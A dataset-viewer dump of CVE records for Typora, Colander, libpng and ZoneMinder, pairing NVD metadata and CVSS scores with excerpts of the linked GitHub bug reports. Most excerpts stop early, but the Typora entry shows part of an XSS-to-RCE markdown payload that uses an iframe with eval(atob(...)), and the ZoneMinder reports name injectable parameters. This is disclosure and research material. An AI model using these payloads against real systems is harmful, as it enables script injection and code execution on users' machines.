"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/typora/typora-issues/issues/2131"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Th... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:typora:typora:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D852391E-C916-458B-9BE1-EC6983BF56F4",
"versionEndExcluding": null,
"versionEndIncluding": "0.9.64",
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/typora/typora-issues/issues/2131 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"typora",
"typora-issues"
] | The new version (**v0.9.64**), only fixed the vulnerability when rendering mathematical formula in block. However it also has this problem when **rendering inline** ,so the new poc:
```markdown
$</script><iframe src=javascript:eval(atob('dmFyIFByb2Nlc3MgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmJpbmRpbmcoJ3Byb2Nlc3Nfd... | The XSS with resultant RCE vulnerability when rendering Mathematical formula inline. | https://api.github.com/repos/typora/typora-issues/issues/2131/comments | 2 | 2019-01-26T09:10:47Z | 2019-03-20T20:09:54Z | https://github.com/typora/typora-issues/issues/2131 | 403,423,061 | 2,131 | 92 |
CVE-2017-18361 | 2019-02-01T09:29:00.233 | In Pylons Colander through 1.6, the URL validator allows an attacker to potentially cause an infinite loop thereby causing a denial of service via an unclosed parenthesis. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Pylons/colander/issues/290"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.c... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pylonsproject:colander:*:*:*:*:*:*:*:*",
"matchCriteriaId": "10A6769F-FEF6-4B61-9A5D-731A871D2094",
"versionEndExcluding": null,
"versionEndIncluding": "1.6",
"versionStartEx... | [
"835"
] | 835 | https://github.com/Pylons/colander/issues/290 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Pylons",
"colander"
] | When there is an unclosed parenthesis in URL and we use _url_ validator, it causes an infinite loop. What's more interesting is that it only happens when the unclosed parenthesis is followed by many characters (check test case number 3 and 4).
```
from colander import MappingSchema, SchemaNode, Str, url
class My... | Unclosed parenthesis in URL causes infinite loop | https://api.github.com/repos/Pylons/colander/issues/290/comments | 1 | 2017-04-26T09:11:05Z | 2019-02-01T18:04:33Z | https://github.com/Pylons/colander/issues/290 | 224,397,208 | 290 | 93 |
CVE-2019-7317 | 2019-02-04T08:29:00.447 | png_image_free in png.c in libpng 1.6.x before 1.6.37 has a use-after-free because png_image_free_function is called under png_safe_execute. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.6,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00002.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:*",
"matchCriteriaId": "078AA00A-515F-493E-A53E-FE1937FA8018",
"versionEndExcluding": "1.6.37",
"versionEndIncluding": null,
"versionStartExcludin... | [
"416"
] | 416 | https://github.com/glennrp/libpng/issues/275 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"glennrp",
"libpng"
] | We ran some tests on an older version of libpng and found a use-after-free bug while running one the test cases. It looks like the bug is still there in the latest code. Here's the output from our tool
DTS_MSG: Stensal DTS detected a fatal program error!
DTS_MSG: Continuing the execution will cause unexpected behav... | Use after free | https://api.github.com/repos/pnggroup/libpng/issues/275/comments | 19 | 2019-01-26T00:53:09Z | 2019-04-15T04:54:40Z | https://github.com/pnggroup/libpng/issues/275 | 403,385,849 | 275 | 94 |
CVE-2019-7325 | 2019-02-04T19:29:00.383 | Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, as multiple views under web/skins/classic/views insecurely utilize $_REQUEST['PHP_SELF'], without applying any proper filtration. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2450"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStart... | [
"79"
] | 79 | https://github.com/ZoneMinder/zoneminder/issues/2450 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
There exists XSS in multiple views as it insecurely utilizes `$_REQUEST['PHP_SELF']`, that is without applying any proper filtration
All the view files available under /web/skins/classic/... | Reflected Site Scripting(XSS) - Multiple ($_SERVER['PHP_SELF']) (1) | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2450/comments | 0 | 2019-01-24T19:31:01Z | 2019-02-10T06:12:59Z | https://github.com/ZoneMinder/zoneminder/issues/2450 | 402,861,864 | 2,450 | 95 |
CVE-2019-7326 | 2019-02-04T19:29:00.430 | Self - Stored Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'Host' parameter value in the view console (console.php) because proper filtration is omitted. This relates to the index.php?view=monitor Host Name field. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2452"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStart... | [
"79"
] | 79 | https://github.com/ZoneMinder/zoneminder/issues/2452 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The view `console`, insecurely prints the `Host` value on the webpage, without applying any proper filtration, leading to Self - stored XSS.
**To Reproduce**
Affected URL :
http://l... | Self - Stored Cross Site Scripting (XSS) - console.php | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2452/comments | 0 | 2019-01-24T19:44:53Z | 2019-02-09T10:30:32Z | https://github.com/ZoneMinder/zoneminder/issues/2452 | 402,866,805 | 2,452 | 96 |
CVE-2019-7327 | 2019-02-04T19:29:00.477 | Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'scale' parameter value in the view frame (frame.php) because proper filtration is omitted. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2447"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStart... | [
"79"
] | 79 | https://github.com/ZoneMinder/zoneminder/issues/2447 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The view `frame`, insecurely prints the `scale` parameter value on the webpage without applying any proper filtration, leading to reflected XSS.
**To Reproduce**
Affected URL :
ht... | Reflected Cross Site Scripting(XSS) - frame.php | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2447/comments | 0 | 2019-01-24T19:18:03Z | 2019-02-09T23:11:58Z | https://github.com/ZoneMinder/zoneminder/issues/2447 | 402,856,994 | 2,447 | 97 |
CVE-2019-7328 | 2019-02-04T19:29:00.523 | Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'scale' parameter value in the view frame (frame.php) via /js/frame.js.php because proper filtration is omitted. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2449"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStart... | [
"79"
] | 79 | https://github.com/ZoneMinder/zoneminder/issues/2449 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The view `frame`, insecurely prints the `scale` parameter value on the webpage that is without applying any proper filtration, leading to XSS.
**To Reproduce**
Affected URL :
http:/... | Reflected Cross Site Scripting(XSS) - frame.php (3) | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2449/comments | 0 | 2019-01-24T19:26:47Z | 2019-02-09T23:11:58Z | https://github.com/ZoneMinder/zoneminder/issues/2449 | 402,860,291 | 2,449 | 98 |
CVE-2019-7329 | 2019-02-04T19:29:00.570 | Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, as the form action on multiple views utilizes $_SERVER['PHP_SELF'] insecurely, mishandling any arbitrary input appended to the webroot URL, without any proper filtration, leading to XSS. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2446"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStart... | [
"79"
] | 79 | https://github.com/ZoneMinder/zoneminder/issues/2446 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The form action on the multiple views utilizes `$_SERVER['PHP_SELF'];` insecurely. Any arbitrary input appended to the webroot URL, without any proper filtration would lead to an reflected X... | Reflected Cross Site Scripting (XSS) - Multiple ($_SERVER['PHP_SELF']) | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2446/comments | 0 | 2019-01-24T19:14:11Z | 2019-02-10T06:12:59Z | https://github.com/ZoneMinder/zoneminder/issues/2446 | 402,855,606 | 2,446 | 99 |
CVE-2019-7330 | 2019-02-04T19:29:00.600 | Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'show' parameter value in the view frame (frame.php) because proper filtration is omitted. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2448"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStart... | [
"79"
] | 79 | https://github.com/ZoneMinder/zoneminder/issues/2448 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The view `frame`, insecurely prints the `show` parameter value on the webpage without applying any proper filtration, leading to reflected XSS.
**To Reproduce**
Affected URL :
http:... | Reflected Cross Site Scripting(XSS) - frame.php (2) | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2448/comments | 0 | 2019-01-24T19:22:37Z | 2019-02-09T23:11:57Z | https://github.com/ZoneMinder/zoneminder/issues/2448 | 402,858,733 | 2,448 | 100 |
CVE-2019-7331 | 2019-02-04T19:29:00.647 | Self - Stored Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3 while editing an existing monitor field named "signal check color" (monitor.php). There exists no input validation or output filtration, leaving it vulnerable to HTML Injection and an XSS attack. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2451"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStart... | [
"79"
] | 79 | https://github.com/ZoneMinder/zoneminder/issues/2451 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
A user can edit an existing monitor thereby modifying various misc properties, one of them being `signal check color`. There exists no input validation & output filtration, leaving it vulner... | Self - Stored Cross Site Scripting (XSS) - monitor.php | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2451/comments | 0 | 2019-01-24T19:40:22Z | 2019-02-10T00:43:25Z | https://github.com/ZoneMinder/zoneminder/issues/2451 | 402,865,181 | 2,451 | 101 |
CVE-2019-7332 | 2019-02-04T19:29:00.693 | Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'eid' (aka Event ID) parameter value in the view download (download.php) because proper filtration is omitted. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2442"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStart... | [
"79"
] | 79 | https://github.com/ZoneMinder/zoneminder/issues/2442 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The view `download`, while exporting an event file, prints the `eid` (Event ID) on the webpage without applying any proper filtration, leading to an XSS issue.
**To Reproduce**
Affec... | Reflected Cross Site Scripting (XSS) - download.php (2) | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2442/comments | 0 | 2019-01-24T17:17:24Z | 2019-02-09T09:37:57Z | https://github.com/ZoneMinder/zoneminder/issues/2442 | 402,812,072 | 2,442 | 102 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.